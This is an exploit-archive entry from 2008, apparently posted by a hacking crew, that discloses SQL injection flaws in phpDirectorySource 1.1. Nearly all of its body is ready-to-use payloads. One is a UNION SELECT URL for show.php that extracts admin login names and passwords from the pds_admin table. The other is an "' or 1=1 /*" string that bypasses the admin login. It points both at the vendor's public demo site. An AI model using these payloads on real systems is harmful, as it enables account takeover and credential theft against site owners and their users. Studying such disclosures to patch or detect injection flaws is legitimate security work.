[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpDirectorySource 1.1 Multiple Remote SQL Injection Vulnerabilities
# Published : 2008-05-03
# Author : InjEctOr5
# Previous Title : Smartblog (index.php tid) Remote SQL Injection Vulnerability
# Next Title : Open Auto Classifieds 1.4.3b Remote SQL Injection Vulnerabilities
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' __ /'__` / __ /'__` / ___ |
| /_, ___ /_/_L ___ ,_/ / _ __ __/ |
| /_/ /' _ ` / /_/__<_ /'___ / /`'__ ___`` |
| / / / L / __/ _ _ / / L |
| _ _ __ ____/ ____\ __\ ____/ _ ____/ |
| /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ /___/ |
| ____/ >> Kings of injection |
| /___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Title :: SQL Injection and Bypass Administrator Login
Author :: InjEctOr [s0f (at) w.cn]
&& FishEr762 [sq7 (at) w.cn]
Application :: phpDirectorySource 1.1
Download :: http://www.phpdirectorysource.com/files/pds_ver1_1.zip
Dork 1 :: use your mind :p
Greets :: Allah , TrYaG TeaM & Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.
--------------------------------------------[C o n t e x t]-----------------------------------------
Expl0!te ::
http://127.0.0.1/[script]/show.php?lid=1'+and+1=0+UNION+SELECT+1,2,3,4,login,pass,7,8,9,10,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+pds_admin/*
i.e.
http://directory.xxx.com/show.php?lid=104'+and+1=0+UNION+SELECT+1,2,3,4,login,pass,7,8,9,10,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+pds_admin/*
note:
used "and 1=0" koz lid is varchar so it's better way to make next query run
--------------
Bypass Administrator Login :
/directory/admin.php
username field
' or 1=1 /*
i.e. in demo site (demos always get the 1st shot lol)
http://www.phpdirectorysource.com/directory/admin.php
-------------------------------------------[End of context]----------------------------------------
# www.Syue.com [2008-05-03]